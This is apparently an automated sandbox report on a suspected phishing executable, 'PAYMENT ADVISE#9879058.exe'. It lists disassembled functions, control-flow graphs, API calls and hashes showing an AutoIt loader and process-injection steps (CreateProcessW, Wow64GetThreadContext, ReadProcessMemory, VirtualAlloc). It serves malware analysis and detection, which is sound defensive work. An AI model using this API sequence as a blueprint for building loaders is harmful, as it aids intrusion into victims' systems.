                          control_flow_graph 1356 40f450-40f45c call 425210 1359 40f460-40f478 1356->1359 1359->1359 1360 40f47a-40f4a8 call 413990 call 410f70 1359->1360 1365 40f4b0-40f4d1 call 4151b0 1360->1365 1368 40f531 1365->1368 1369 40f4d3-40f4da 1365->1369 1370 40f536-40f540 1368->1370 1371 40f4dc-40f4de 1369->1371 1372 40f4fd-40f517 call 41557c 1369->1372 1374 40f4e0-40f4e2 1371->1374 1375 40f51c-40f51f 1372->1375 1376 40f4e6-40f4ed 1374->1376 1375->1365 1377 40f521-40f52c 1376->1377 1378 40f4ef-40f4f2 1376->1378 1381 40f543-40f54e 1377->1381 1382 40f52e-40f52f 1377->1382 1379 42937a-4293a0 call 41557c call 4151b0 1378->1379 1380 40f4f8-40f4fb 1378->1380 1392 4293a5-4293c3 call 4151d0 1379->1392 1380->1372 1380->1374 1384 40f550-40f553 1381->1384 1385 40f555-40f560 1381->1385 1382->1378 1384->1378 1387 429372 1385->1387 1388 40f566-40f571 1385->1388 1387->1379 1390 429361-429367 1388->1390 1391 40f577-40f57a 1388->1391 1390->1376 1393 42936d 1390->1393 1391->1378 1392->1370 1393->1387
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __fread_nolock_fseek_strcat
                          • String ID: AU3!$EA06
                          • API String ID: 3818483258-2658333250
                          • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                          • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                          • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                          • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B
                          Function 00410130 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1396 410130-410142 SHGetMalloc 1397 410148-410158 SHGetDesktopFolder 1396->1397 1398 42944f-429459 call 411691 1396->1398 1399 4101d1-4101e0 1397->1399 1400 41015a-410188 call 411691 1397->1400 1399->1398 1406 4101e6-4101ee 1399->1406 1408 4101c5-4101ce 1400->1408 1409 41018a-4101a1 SHGetPathFromIDListW 1400->1409 1408->1399 1410 4101a3-4101b1 call 411691 1409->1410 1411 4101b4-4101c0 1409->1411 1410->1411 1411->1408
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcscpy$DesktopFolderFromListMallocPath
                          • String ID: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe
                          • API String ID: 192938534-1900576882
                          • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                          • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                          • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                          • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6
                          Function 00401230 Relevance: 12.1, APIs: 8, Instructions: 83windowtimeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1414 401230-40123b 1415 401241-401272 call 4131f0 call 401be0 1414->1415 1416 4012c5-4012cd 1414->1416 1421 401274-401292 1415->1421 1422 4012ae-4012bf KillTimer SetTimer 1415->1422 1423 42aa61-42aa67 1421->1423 1424 401298-40129c 1421->1424 1422->1416 1427 42aa8b-42aaa7 Shell_NotifyIconW 1423->1427 1428 42aa69-42aa86 Shell_NotifyIconW 1423->1428 1425 4012a2-4012a8 1424->1425 1426 42aaac-42aab3 1424->1426 1425->1422 1429 42aaf8-42ab15 Shell_NotifyIconW 1425->1429 1430 42aad7-42aaf3 Shell_NotifyIconW 1426->1430 1431 42aab5-42aad2 Shell_NotifyIconW 1426->1431 1427->1422 1428->1422 1429->1422 1430->1422 1431->1422
                          APIs
                          • _memset.LIBCMT ref: 00401257
                            • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                            • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                            • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                            • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                          • KillTimer.USER32(?,?), ref: 004012B0
                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                          • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                          • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                          • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                          • String ID:
                          • API String ID: 1792922140-0
                          • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                          • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                          • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                          • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                          Function 03FA9E40 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1432 3fa9e40-3fa9eee call 3fa7850 1435 3fa9ef5-3fa9f1b call 3faad50 CreateFileW 1432->1435 1438 3fa9f1d 1435->1438 1439 3fa9f22-3fa9f32 1435->1439 1440 3faa06d-3faa071 1438->1440 1446 3fa9f39-3fa9f53 VirtualAlloc 1439->1446 1447 3fa9f34 1439->1447 1442 3faa0b3-3faa0b6 1440->1442 1443 3faa073-3faa077 1440->1443 1448 3faa0b9-3faa0c0 1442->1448 1444 3faa079-3faa07c 1443->1444 1445 3faa083-3faa087 1443->1445 1444->1445 1449 3faa089-3faa093 1445->1449 1450 3faa097-3faa09b 1445->1450 1451 3fa9f5a-3fa9f71 ReadFile 1446->1451 1452 3fa9f55 1446->1452 1447->1440 1453 3faa0c2-3faa0cd 1448->1453 1454 3faa115-3faa12a 1448->1454 1449->1450 1457 3faa0ab 1450->1457 1458 3faa09d-3faa0a7 1450->1458 1459 3fa9f78-3fa9fb8 VirtualAlloc 1451->1459 1460 3fa9f73 1451->1460 1452->1440 1461 3faa0cf 1453->1461 1462 3faa0d1-3faa0dd 1453->1462 1455 3faa13a-3faa142 1454->1455 1456 3faa12c-3faa137 VirtualFree 1454->1456 1456->1455 1457->1442 1458->1457 1463 3fa9fba 1459->1463 1464 3fa9fbf-3fa9fda call 3faafa0 1459->1464 1460->1440 1461->1454 1465 3faa0df-3faa0ef 1462->1465 1466 3faa0f1-3faa0fd 1462->1466 1463->1440 1472 3fa9fe5-3fa9fef 1464->1472 1467 3faa113 1465->1467 1468 3faa10a-3faa110 1466->1468 1469 3faa0ff-3faa108 1466->1469 1467->1448 1468->1467 1469->1467 1473 3faa022-3faa036 call 3faadb0 1472->1473 1474 3fa9ff1-3faa020 call 3faafa0 1472->1474 1480 3faa03a-3faa03e 1473->1480 1481 3faa038 1473->1481 1474->1472 1482 3faa04a-3faa04e 1480->1482 1483 3faa040-3faa044 CloseHandle 1480->1483 1481->1440 1484 3faa05e-3faa067 1482->1484 1485 3faa050-3faa05b VirtualFree 1482->1485 1483->1482 1484->1435 1484->1440 1485->1484
                          APIs
                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03FA9F11
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03FAA137
                          Memory Dump Source
                          • Source File: 00000000.00000002.1738858530.0000000003FA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA7000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3fa7000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CreateFileFreeVirtual
                          • String ID:
                          • API String ID: 204039940-0
                          • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                          • Instruction ID: ce6ff37cdf5a49bef6851f2e18c5f43a20d44f9e7a81719ac22cc00cd5e37816
                          • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                          • Instruction Fuzzy Hash: E4A128B5E00609EBDF14CFA8C894BEEB7B5BF48304F208199E105BB290D7759A84DF54
                          Function 00414F10 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1486 414f10-414f2c 1487 414f4f 1486->1487 1488 414f2e-414f31 1486->1488 1490 414f51-414f55 1487->1490 1488->1487 1489 414f33-414f35 1488->1489 1491 414f37-414f46 call 417f23 1489->1491 1492 414f56-414f5b 1489->1492 1504 414f47-414f4c call 417ebb 1491->1504 1494 414f6a-414f6d 1492->1494 1495 414f5d-414f68 1492->1495 1497 414f7a-414f7c 1494->1497 1498 414f6f-414f77 call 4131f0 1494->1498 1495->1494 1496 414f8b-414f9e 1495->1496 1502 414fa0-414fa6 1496->1502 1503 414fa8 1496->1503 1497->1491 1501 414f7e-414f89 1497->1501 1498->1497 1501->1491 1501->1496 1506 414faf-414fb1 1502->1506 1503->1506 1504->1487 1508 4150a1-4150a4 1506->1508 1509 414fb7-414fbe 1506->1509 1508->1490 1511 414fc0-414fc5 1509->1511 1512 415004-415007 1509->1512 1511->1512 1515 414fc7 1511->1515 1513 415071-415072 call 41e6b1 1512->1513 1514 415009-41500d 1512->1514 1521 415077-41507b 1513->1521 1517 41500f-415018 1514->1517 1518 41502e-415035 1514->1518 1519 415102 1515->1519 1520 414fcd-414fd1 1515->1520 1522 415023-415028 1517->1522 1523 41501a-415021 1517->1523 1525 415037 1518->1525 1526 415039-41503c 1518->1526 1524 415106-41510f 1519->1524 1527 414fd3 1520->1527 1528 414fd5-414fd8 1520->1528 1521->1524 1531 415081-415085 1521->1531 1532 41502a-41502c 1522->1532 1523->1532 1524->1490 1525->1526 1533 415042-41504e call 41453a call 41ed9e 1526->1533 1534 4150d5-4150d9 1526->1534 1527->1528 1529 4150a9-4150af 1528->1529 1530 414fde-414fff call 41ee9b 1528->1530 1539 4150b1-4150bd call 4131f0 1529->1539 1540 4150c0-4150d0 call 417f23 1529->1540 1545 415099-41509b 1530->1545 1531->1534 1538 415087-415096 1531->1538 1532->1526 1554 415053-415058 1533->1554 1536 4150eb-4150fd call 417f23 1534->1536 1537 4150db-4150e8 call 4131f0 1534->1537 1536->1504 1537->1536 1538->1545 1539->1540 1540->1504 1545->1508 1545->1509 1555 415114-415118 1554->1555 1556 41505e-415061 1554->1556 1555->1524 1556->1519 1557 415067-41506f 1556->1557 1557->1545
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                          • String ID:
                          • API String ID: 3886058894-0
                          • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                          • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                          • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                          • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99
                          Function 004103E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1558 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                          • ShowWindow.USER32(?,00000000), ref: 00410454
                          • ShowWindow.USER32(?,00000000), ref: 0041045E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                          • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                          • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                          • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                          Function 03FA9C00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1559 3fa9c00-3fa9d3d call 3fa7850 call 3fa9af0 CreateFileW 1566 3fa9d3f 1559->1566 1567 3fa9d44-3fa9d54 1559->1567 1568 3fa9df4-3fa9df9 1566->1568 1570 3fa9d5b-3fa9d75 VirtualAlloc 1567->1570 1571 3fa9d56 1567->1571 1572 3fa9d79-3fa9d90 ReadFile 1570->1572 1573 3fa9d77 1570->1573 1571->1568 1574 3fa9d92 1572->1574 1575 3fa9d94-3fa9dce call 3fa9b30 call 3fa8af0 1572->1575 1573->1568 1574->1568 1580 3fa9dea-3fa9df2 ExitProcess 1575->1580 1581 3fa9dd0-3fa9de5 call 3fa9b80 1575->1581 1580->1568 1581->1580
                          APIs
                            • Part of subcall function 03FA9AF0: Sleep.KERNELBASE(000001F4), ref: 03FA9B01
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03FA9D33
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1738858530.0000000003FA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA7000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3fa7000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CreateFileSleep
                          • String ID: 1EAOEWYAHYN5266O7A3KBSP63
                          • API String ID: 2694422964-501168602
                          • Opcode ID: d18dea7d4d34a6ccc3098c66765e05cf7c1ed2c36ddc1be6dad4f69cbc7f51c1
                          • Instruction ID: 10bc4b7b1a755a4af1c1ddaf638489adfc5f1f7782c37da50144fc5a9c4a1829
                          • Opcode Fuzzy Hash: d18dea7d4d34a6ccc3098c66765e05cf7c1ed2c36ddc1be6dad4f69cbc7f51c1
                          • Instruction Fuzzy Hash: F5518471D0428DDAEF11D7A8C854BEFBB78AF15304F044199E6497B2C1C7B90B89CB65
                          Function 00413A88 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1583 413a88-413a99 call 41718c 1586 413b10-413b15 call 4171d1 1583->1586 1587 413a9b-413aa2 1583->1587 1588 413aa4-413abc call 418407 call 419f6d 1587->1588 1589 413ae7 1587->1589 1601 413ac7-413ad7 call 413ade 1588->1601 1602 413abe-413ac6 call 419f9d 1588->1602 1591 413ae8-413af8 RtlFreeHeap 1589->1591 1591->1586 1594 413afa-413b0f call 417f23 GetLastError call 417ee1 1591->1594 1594->1586 1601->1586 1608 413ad9-413adc 1601->1608 1602->1601 1608->1591
                          APIs
                          • __lock.LIBCMT ref: 00413AA6
                            • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                            • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                            • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                          • ___sbh_find_block.LIBCMT ref: 00413AB1
                          • ___sbh_free_block.LIBCMT ref: 00413AC0
                          • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                          • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                          • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                          • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                          • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                          Function 0040F5E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                            • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                            • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                          • _strcat.LIBCMT ref: 0040F603
                            • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                            • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                          • String ID: HH
                          • API String ID: 1194219731-2761332787
                          • Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                          • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                          • Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                          • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                          Function 03FA8AF0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03FA92AB
                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FA9341
                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FA9363
                          Memory Dump Source
                          • Source File: 00000000.00000002.1738858530.0000000003FA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA7000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3fa7000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                          • String ID:
                          • API String ID: 2438371351-0
                          • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                          • Instruction ID: a303b5008bf544148b2d1d830746f9a3ad2bd8ff25a84fb158f5b5d143c6b191
                          • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                          • Instruction Fuzzy Hash: 06620A74A14658DBEB24CFA4C850BDEB376EF58300F1091A9D10DEB390E7B69E81CB59
                          Function 0041171A Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                          Download Yara Rule
                          APIs
                          • _malloc.LIBCMT ref: 00411734
                            • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                            • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                            • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                          • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                            • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                          • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                          • __CxxThrowException@8.LIBCMT ref: 00411779
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                          • String ID:
                          • API String ID: 1411284514-0
                          • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                          • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                          • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                          • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                          Function 004734B7 Relevance: 4.7, APIs: 3, Instructions: 234COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                          • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                          • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                          • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                          Function 0040F110 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
